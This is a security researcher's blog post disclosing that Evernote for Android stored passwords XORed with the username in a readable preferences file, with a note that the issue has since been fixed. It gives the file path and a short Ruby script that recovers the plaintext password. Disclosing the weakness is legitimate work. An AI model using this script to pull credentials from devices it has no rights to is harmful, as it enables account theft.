Evernote: XOR & Passwords

Image: Photo by Sarah Kilian on Unsplash

Update: Evernote has reported that this issue has been addressed.

Evernote for Android stores various settings in an XML, this file though isn’t really protected – it’s easily readable, especially if an attacker is able to get physical access to a device, what’s worse is that it contains the user’s credentials.

/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml

The username in located in the <string name="username"> element, and the password is stored in <string name="encrypted_password"> – from the name you’d assume that the password is actually encrypted. You’d be wrong.

The password is simply XORed with the username, making recovery simple.

Here’s a simple script to “decrypt” the password:

#!/usr/bin/env ruby

##
# Copyright 2013 Adam Caudill &lt;[email protected]&gt;
#
# Decodes Evernote password recovered from Evernote for Android config file:
# File: /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
#   (may also be in &lt;userid&gt;.prof.xml if missing from com.evernote_preferences.xml)
# Password: &lt;string name="encrypted_password"&gt;
# Username: &lt;string name="username"&gt;
##

require "base64"

if ARGV.count != 2
  puts 'Usage: ./evernote_pass_decode.rb &lt;pass&gt; &lt;username&gt;'
end

pass = Base64.decode64(ARGV[0])
user = ARGV[1]
final = ''

pass.bytes.each_with_index do |byte, index|
  final += (byte ^ user[index % user.length].unpack('c')[0]).chr
end

puts "Password: #{final}"

Adam Caudill

Adam Caudill

Evernote: XOR & Passwords

Related Posts

Evernote: Doing it (mostly) right

Security Is a Shell Game

On The Ethics of BadUSB

Making BadUSB Work For You – DerbyCon

UPEK Windows Password Decryption

Yahoo’s Associated Content Hacked?

About Me